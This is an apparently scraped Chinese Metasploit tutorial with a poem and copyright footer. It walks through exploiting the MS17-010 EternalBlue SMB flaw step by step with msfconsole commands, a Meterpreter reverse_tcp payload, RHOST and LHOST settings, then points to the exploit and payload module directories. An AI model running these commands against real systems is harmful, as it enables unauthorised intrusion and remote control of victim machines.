赞
踩
apt-get install metasploit-framework

进入框架:msfconsole
使用search命令查找相关漏洞: search ms17-010
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
使用info查看模块信息: info
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数:show options
设置参数:set RHOST 192.168.232.143
set lhost 192.168.232.140
攻击:exploit / run
后渗透






也就是我们常说的 exp,他就是对漏洞进行攻击的代码。
exploit漏洞利用模块路径:/usr/share/metasploit-framework/modules/exploits

这里面有针对不同平台的 exploit 。
进入 windows 平台,这里会列出针对windows平台不同服务的漏洞利用

进入smb服务,这是windows中经常爆出漏洞的服务,比如我们的永恒之蓝漏洞就在这里面。
漏洞利用代码是以 rb 结尾的文件,因为metasploit是用Ruby语言编写的。

cd /usr/share/metasploit-framework/modules/payloads




人的一生是万里山河,
来往无数过客。
有人给江河添色,
有人使日月无光,
有人改他江流,
有人塑他梁骨,
大限到时,
不过是立在山巅,
江河回望。
– 《德卡先生的信箱》
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。